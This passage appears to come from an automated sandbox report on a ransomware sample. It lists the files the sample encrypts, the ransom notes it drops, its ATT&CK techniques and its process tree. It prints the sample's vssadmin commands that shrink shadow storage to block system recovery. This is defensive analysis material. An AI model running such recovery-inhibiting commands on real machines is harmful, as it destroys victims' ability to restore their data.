File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\FA000000008.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Crashpad\metadata	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Crashpad\metadata.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\initial_preferences	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\postSigningData.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\postSigningData.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\FA000000009.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Crashpad\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\removed-files.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f33\FA000000033.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\FA000000009.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\FA000000050.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\initial_preferences.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\FA000000009	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\FA000000006.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000006\FA000000006.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000011\FA000000011.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Installer\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{37B8F9C7-03FB-3253-8781-2517C99D7C00}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{662A0088-6FCD-45DD-9EA7-68674058AED5}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Panther\setupinfo.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Boot\DVD\EFI\BCD	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{4A03706F-666A-4037-7777-5F2748764D10}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{7DAD0258-515C-3DD4-8964-BD714199E0F7}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{9F51D16B-42E8-4A4A-8228-75045541A2AE}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{4A03706F-666A-4037-7777-5F2748764D10}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Installer\SourceHash{37B8F9C7-03FB-3253-8781-2517C99D7C00}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{77924AE4-039E-4CA4-87B4-2F64180381F0}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{9BE518E6-ECC6-35A9-88E4-87755C07200F}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{E634F316-BEB6-4FB3-A612-F7102F576165}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Installer\SourceHash{9F51D16B-42E8-4A4A-8228-75045541A2AE}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{37B8F9C7-03FB-3253-8781-2517C99D7C00}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{BF08E976-B92E-4336-B56F-2171179476C4}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\SoftwareDistribution\Download\SharedFileCache\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{B175520C-86A2-35A7-8619-86DC379688B9}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{1D8E6291-B0D5-35EC-8441-6616F567A0F7}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{90160000-007E-0000-1000-0000000FF1CE}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Boot\DVD\PCAT\BCD	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{2BB73336-4F69-4141-9797-E9BD6FE3980A}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Installer\SourceHash{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{79043ED0-7ED1-4227-A5E5-04C5594D21F7}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{B175520C-86A2-35A7-8619-86DC379688B9}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{E634F316-BEB6-4FB3-A612-F7102F576165}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\Boot\DVD\EFI\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{BF08E976-B92E-4336-B56F-2171179476C4}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SystemCertificates\My\!!!HOW_TO_DECRYPT!!!.mht	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{90160000-008C-0409-1000-0000000FF1CE}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Panther\setupinfo	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}.inprocess	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Installer\SourceHash{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}.gpay	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Boot\PCAT\bootmgr	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Installer\SourceHash{77924AE4-039E-4CA4-87B4-2F64180381F0}	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 13 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3244	vssadmin.exe
1488	vssadmin.exe
4828	vssadmin.exe
408	vssadmin.exe
1116	vssadmin.exe
2960	vssadmin.exe
2064	vssadmin.exe
4552	vssadmin.exe
828	vssadmin.exe
1148	vssadmin.exe
804	vssadmin.exe
736	vssadmin.exe
4220	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeBackupPrivilege	932	vssvc.exe
Token: SeRestorePrivilege	932	vssvc.exe
Token: SeAuditPrivilege	932	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1112	wmic.exe
Token: SeSecurityPrivilege	1112	wmic.exe
Token: SeTakeOwnershipPrivilege	1112	wmic.exe
Token: SeLoadDriverPrivilege	1112	wmic.exe
Token: SeSystemProfilePrivilege	1112	wmic.exe
Token: SeSystemtimePrivilege	1112	wmic.exe
Token: SeProfSingleProcessPrivilege	1112	wmic.exe
Token: SeIncBasePriorityPrivilege	1112	wmic.exe
Token: SeCreatePagefilePrivilege	1112	wmic.exe
Token: SeBackupPrivilege	1112	wmic.exe
Token: SeRestorePrivilege	1112	wmic.exe
Token: SeShutdownPrivilege	1112	wmic.exe
Token: SeDebugPrivilege	1112	wmic.exe
Token: SeSystemEnvironmentPrivilege	1112	wmic.exe
Token: SeRemoteShutdownPrivilege	1112	wmic.exe
Token: SeUndockPrivilege	1112	wmic.exe
Token: SeManageVolumePrivilege	1112	wmic.exe
Token: 33	1112	wmic.exe
Token: 34	1112	wmic.exe
Token: 35	1112	wmic.exe
Token: 36	1112	wmic.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 408	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	84
PID 1528 wrote to memory of 408	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	84
PID 1528 wrote to memory of 1116	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	89
PID 1528 wrote to memory of 1116	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	89
PID 1528 wrote to memory of 2960	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	91
PID 1528 wrote to memory of 2960	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	91
PID 1528 wrote to memory of 804	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	93
PID 1528 wrote to memory of 804	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	93
PID 1528 wrote to memory of 2064	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	95
PID 1528 wrote to memory of 2064	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	95
PID 1528 wrote to memory of 4552	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	97
PID 1528 wrote to memory of 4552	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	97
PID 1528 wrote to memory of 3244	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	99
PID 1528 wrote to memory of 3244	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	99
PID 1528 wrote to memory of 736	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	101
PID 1528 wrote to memory of 736	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	101
PID 1528 wrote to memory of 1488	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	103
PID 1528 wrote to memory of 1488	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	103
PID 1528 wrote to memory of 4828	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	105
PID 1528 wrote to memory of 4828	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	105
PID 1528 wrote to memory of 4220	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	107
PID 1528 wrote to memory of 4220	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	107
PID 1528 wrote to memory of 828	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	109
PID 1528 wrote to memory of 828	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	109
PID 1528 wrote to memory of 1148	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	111
PID 1528 wrote to memory of 1148	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	111
PID 1528 wrote to memory of 4960	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	113
PID 1528 wrote to memory of 4960	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	113
PID 1528 wrote to memory of 2116	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	115
PID 1528 wrote to memory of 2116	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	115
PID 1528 wrote to memory of 920	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	117
PID 1528 wrote to memory of 920	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	117
PID 1528 wrote to memory of 4764	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	119
PID 1528 wrote to memory of 4764	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	119
PID 1528 wrote to memory of 1112	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	121
PID 1528 wrote to memory of 1112	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	121
PID 1528 wrote to memory of 4844	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	134
PID 1528 wrote to memory of 4844	1528	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe	134

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cc3652c078fa2bdfbbfae33335c30bda_JaffaCakes118.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1528
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:408
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1116
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2960
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:804
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2064
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4552
- C:\Windows\SYSTEM32\vssadmin.exe
